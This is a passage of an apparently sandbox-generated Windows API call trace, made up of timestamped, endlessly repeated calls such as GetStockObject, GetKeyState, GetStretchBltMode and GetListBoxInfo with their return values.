0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.158] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.158] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.159] GetKeyState (nVirtKey=1) returned 0 [0032.159] GetStretchBltMode (hdc=0x1) returned 0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.159] GetKeyState (nVirtKey=1) returned 0 [0032.159] GetStretchBltMode (hdc=0x1) returned 0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.159] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.160] GetKeyState (nVirtKey=1) returned 0 [0032.160] GetStretchBltMode (hdc=0x1) returned 0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.160] GetKeyState (nVirtKey=1) returned 0 [0032.160] GetStretchBltMode (hdc=0x1) returned 0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.160] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.161] GetKeyState (nVirtKey=1) returned 0 [0032.161] GetStretchBltMode (hdc=0x1) returned 0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.161] GetKeyState (nVirtKey=1) returned 0 [0032.161] GetStretchBltMode (hdc=0x1) returned 0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.161] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.162] GetKeyState (nVirtKey=1) returned 0 [0032.162] GetStretchBltMode (hdc=0x1) returned 0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.162] GetKeyState (nVirtKey=1) returned 0 [0032.162] GetStretchBltMode (hdc=0x1) returned 0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.162] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.163] GetKeyState (nVirtKey=1) returned 0 [0032.163] GetStretchBltMode (hdc=0x1) returned 0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.163] GetKeyState (nVirtKey=1) returned 0 [0032.163] GetStretchBltMode (hdc=0x1) returned 0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.163] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.164] GetKeyState (nVirtKey=1) returned 0 [0032.164] GetStretchBltMode (hdc=0x1) returned 0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.164] GetKeyState (nVirtKey=1) returned 0 [0032.164] GetStretchBltMode (hdc=0x1) returned 0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.164] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.165] GetKeyState (nVirtKey=1) returned 0 [0032.165] GetStretchBltMode (hdc=0x1) returned 0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.165] GetKeyState (nVirtKey=1) returned 0 [0032.165] GetStretchBltMode (hdc=0x1) returned 0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.165] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.166] GetKeyState (nVirtKey=1) returned 0 [0032.166] GetStretchBltMode (hdc=0x1) returned 0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetStockObject (i=789644) returned 0x0 [0032.166] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.166] GetKeyState (nVirtKey=1) returned 0 [0032.166] GetStretchBltMode (hdc=0x1) returned 0 [0032.166] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.166] GetKeyState (nVirtKey=1) returned 0 [0032.166] GetStretchBltMode (hdc=0x1) returned 0 [0032.166] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.166] GetKeyState (nVirtKey=1) returned 0 [0032.166] GetStretchBltMode (hdc=0x1) returned 0 [0032.166] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.166] GetKeyState (nVirtKey=1) returned 0 [0032.166] GetStretchBltMode (hdc=0x1) returned 0 [0032.166] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.166] GetKeyState (nVirtKey=1) returned 0 [0032.166] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.167] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.167] GetKeyState (nVirtKey=1) returned 0 [0032.167] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.168] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.168] GetKeyState (nVirtKey=1) returned 0 [0032.168] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.169] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.169] GetKeyState (nVirtKey=1) returned 0 [0032.169] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.170] GetKeyState (nVirtKey=1) returned 0 [0032.170] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.170] GetKeyState (nVirtKey=1) returned 0 [0032.170] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.170] GetKeyState (nVirtKey=1) returned 0 [0032.170] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.170] GetKeyState (nVirtKey=1) returned 0 [0032.170] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.170] GetKeyState (nVirtKey=1) returned 0 [0032.170] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.170] GetKeyState (nVirtKey=1) returned 0 [0032.170] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.170] GetKeyState (nVirtKey=1) returned 0 [0032.170] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.170] GetKeyState (nVirtKey=1) returned 0 [0032.170] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.170] GetKeyState (nVirtKey=1) returned 0 [0032.170] GetStretchBltMode (hdc=0x1) returned 0 [0032.170] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.171] GetKeyState (nVirtKey=1) returned 0 [0032.171] GetStretchBltMode (hdc=0x1) returned 0 [0032.171] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.171] GetKeyState (nVirtKey=1) returned 0 [0032.171] GetStretchBltMode (hdc=0x1) returned 0 [0032.171] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.171] GetKeyState (nVirtKey=1) returned 0 [0032.171] GetStretchBltMode (hdc=0x1) returned 0 [0032.171] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.172] GetKeyState (nVirtKey=1) returned 0 [0032.172] GetStretchBltMode (hdc=0x1) returned 0 [0032.172] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.172] GetKeyState (nVirtKey=1) returned 0 [0032.172] GetStretchBltMode (hdc=0x1) returned 0 [0032.172] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.173] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.173] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.173] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.173] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.173] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.173] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.173] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.173] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.173] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.173] GetKeyState (nVirtKey=1) returned 0 [0032.173] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.174] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.174] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.174] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.174] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.174] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.174] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.174] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.174] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.174] GetStretchBltMode (hdc=0x1) returned 0 [0032.174] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.174] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.175] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.175] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.175] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.175] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.175] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.175] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.175] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.175] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.175] GetKeyState (nVirtKey=1) returned 0 [0032.175] GetStretchBltMode (hdc=0x1) returned 0 [0032.175] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.176] GetStretchBltMode (hdc=0x1) returned 0 [0032.176] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.176] GetStretchBltMode (hdc=0x1) returned 0 [0032.176] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.176] GetStretchBltMode (hdc=0x1) returned 0 [0032.176] GetListBoxInfo (hwnd=0x0) returned 0x0 [0032.176] GetKeyState (nVirtKey=1) returned 0 [0032.176] GetStretchBltMode 